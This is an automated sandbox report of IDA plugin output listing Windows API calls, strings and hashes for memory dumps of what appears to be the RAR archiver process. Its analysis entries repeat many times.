                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                    • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                                    • Instruction ID: 61af75dd42fbf3741d708b979c326122413ed76f9d4f97a5ac18875074ae5358
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1C02B32E01481C0C514672E88950341160FF44F35FD01370C13D4A1F0DF5848EF0300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                    • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                    • Instruction ID: fba2a4a6e49ec84d5aa97e5f6daf5ae350b5c8890bd96bf57e8aaa97d39758c4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F08C23A0864286FB348B65E44037836B0DB10F78F986378DA7D860D8CE68DE96C7D0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A7B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D149F4: LoadStringW.USER32 ref: 00007FF695D14A94
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730
                                                                                                                                                                                                                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CF6CB0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                                                                    • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                                                                    • API String ID: 668332963-4283793440
                                                                                                                                                                                                                                                                    • Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                                                                                                                                                                                                                                    • Instruction ID: 8de40eeafc83ec18ff22453e80a0478988c1f139770b279b48ae7fa601586e70
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B22B423A0C6C295EB30DB24E8511F967F1FF41B44F4411BAEA8D8769ADE2CEE49D704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 00007FF695CED4A6
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00007FF695CED4B9
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF73
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF84
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695CEEFA7
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695CEEFCA
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: GetLastError.KERNEL32 ref: 00007FF695CEEFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: CloseHandle.KERNEL32 ref: 00007FF695CEEFE7
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32 ref: 00007FF695CED4C6
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 00007FF695CED64A
                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 00007FF695CED68B
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00007FF695CED69A
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00007FF695CED6AD
                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32 ref: 00007FF695CED6FA
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32 ref: 00007FF695CED705
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF2310: FlushFileBuffers.KERNEL32 ref: 00007FF695CF233E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF2310: SetFileTime.KERNEL32 ref: 00007FF695CF23DB
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1930: CloseHandle.KERNELBASE ref: 00007FF695CF1958
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF39E0: SetFileAttributesW.KERNEL32(?,00007FF695CF34EE,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF3A0F
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF39E0: SetFileAttributesW.KERNEL32(?,00007FF695CF34EE,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF3A3C
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                                                    • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                                                    • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                                                    • Instruction ID: 3b06b6d0ba4739e0532f05759fb45ecf47dcd3455d1aecb3a29a802f5bee29b7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BD1AC26A08686D6EB309F20E8412F937F0FB54B98F405279DA5D876D9DE3CDE0AC740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AEE9
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF01
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF19
                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AF75
                                                                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1AFB0
                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B23B
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B244
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF695CD2E4C), ref: 00007FF695D1B287
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                                                    • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                                                    • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                                                    • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                                                    • Instruction ID: d0211444c3835945089ed9e9beb1d9f77b3dc5f19f670def1eef39f48f084c56
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC17D22A09A8289FB24DF21E8502BD27E0FF44F98F446275DA4E8B795DF3CD949C744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                    • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                                                                    • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                                                    • Instruction ID: ab28e30d25a1424952482c7f089d3fa8e0775b40b898d9b10e99fbcbb6ee645f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621D531A1860282F7B4CF20E45537A73E1EB94F04F506175D94E8B598DF3DD88E8748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE298
                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE2AB
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE2F7
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF73
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF695CEEE47), ref: 00007FF695CEEF84
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF695CEEFA7
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF695CEEFCA
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: GetLastError.KERNEL32 ref: 00007FF695CEEFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CEEF50: CloseHandle.KERNEL32 ref: 00007FF695CEEFE7
                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 00007FF695CEE357
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF695CD2014), ref: 00007FF695CEE362
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                    • String ID: SeBackupPrivilege
                                                                                                                                                                                                                                                                    • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                                                                    • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                                                    • Instruction ID: 97253886bcb41b844539ea96ec36089d2d8f13dc13240bc43e0df370dd00255f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14618C32A0868286E7349F61E4452B933E0FB44B98F405279DB6E97AD4DF3CED49C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Sleepswprintf
                                                                                                                                                                                                                                                                    • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                                                                    • API String ID: 407366315-3491873314
                                                                                                                                                                                                                                                                    • Opcode ID: c9f3de61729852c76deda6d3bc53b2966b68ce423666986f381f2cda437ab536
                                                                                                                                                                                                                                                                    • Instruction ID: 1c50be6d04889db5a2f1685dfe9b1d0d10b6d9f7add6d66f692b122c1874446b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9f3de61729852c76deda6d3bc53b2966b68ce423666986f381f2cda437ab536
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F202F532A0868286EB30DF25E4446AD77E5FB88F84F411276DE5D8B799DE3CE849C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • new.LIBCMT ref: 00007FF695CD4BD8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695D1B6D0: Sleep.KERNEL32(?,?,?,?,00007FF695CECBED,?,00000000,?,00007FF695D17A8C), ref: 00007FF695D1B730
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1E80: CreateFileW.KERNELBASE ref: 00007FF695CF1F4A
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1E80: GetLastError.KERNEL32 ref: 00007FF695CF1F59
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1E80: CreateFileW.KERNELBASE ref: 00007FF695CF1F99
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1E80: GetLastError.KERNEL32 ref: 00007FF695CF1FA2
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF695CF1E80: SetFileTime.KERNEL32 ref: 00007FF695CF1FF1
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true
